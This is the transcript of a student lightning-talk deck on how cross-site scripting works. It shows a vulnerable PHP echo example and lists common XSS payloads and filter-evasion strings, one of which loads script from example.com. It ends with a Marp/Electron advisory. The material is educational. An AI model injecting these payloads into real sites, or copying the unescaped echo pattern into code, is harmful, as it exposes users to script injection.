Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
85
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
200
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
320
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
420
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
910
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
390
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
180
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
180
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
340
Other Decks in Technology
See All in Technology
ドキュメントはAIの味方!スタートアップのアジャイルを加速するADR
kawauso
3
470
Lessons from CVE-2025-22869: Memory Debugging and OSS Vulnerability Reporting
vvatanabe
2
110
Flutterでキャッチしないエラーはどこに行く
taiju59
0
190
役割は変わっても、変わらないもの 〜スクラムマスターからEMへの転身で学んだ信頼構築の本質〜 / How to build trust
shinop
0
150
ヘブンバーンズレッドにおける、世界観を活かしたミニゲーム企画の作り方
gree_tech
PRO
0
360
退屈なことはDevinにやらせよう〜〜Devin APIを使ったVisual Regression Testの自動追加〜
kawamataryo
4
940
【5分でわかる】セーフィー エンジニア向け会社紹介
safie_recruit
0
30k
人と組織に偏重したEMへのアンチテーゼ──なぜ、EMに設計力が必要なのか/An antithesis to the overemphasis of people and organizations in EM
dskst
7
810
実践アプリケーション設計 ③ドメイン駆動設計
recruitengineers
PRO
13
3.8k
攻撃と防御で実践するプロダクトセキュリティ演習~導入パート~
recruitengineers
PRO
3
1.6k
Grafana Meetup Japan Vol. 6
kaedemalu
1
180
「魔法少女まどか☆マギカ Magia Exedra」のグローバル展開を支える、開発チームと翻訳チームの「意識しない協創」を実現するローカライズシステム
gree_tech
PRO
0
360
Featured
See All Featured
Art, The Web, and Tiny UX
lynnandtonic
302
21k
Large-scale JavaScript Application Architecture
addyosmani
512
110k
Imperfection Machines: The Place of Print at Facebook
scottboms
268
13k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
34
6k
Faster Mobile Websites
deanohume
309
31k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
23
1.4k
GraphQLの誤解/rethinking-graphql
sonatard
71
11k
Why You Should Never Use an ORM
jnunemaker
PRO
59
9.5k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
131
19k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
18
1.1k
How to train your dragon (web standard)
notwaldorf
96
6.2k
Unsuck your backbone
ammeep
671
58k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron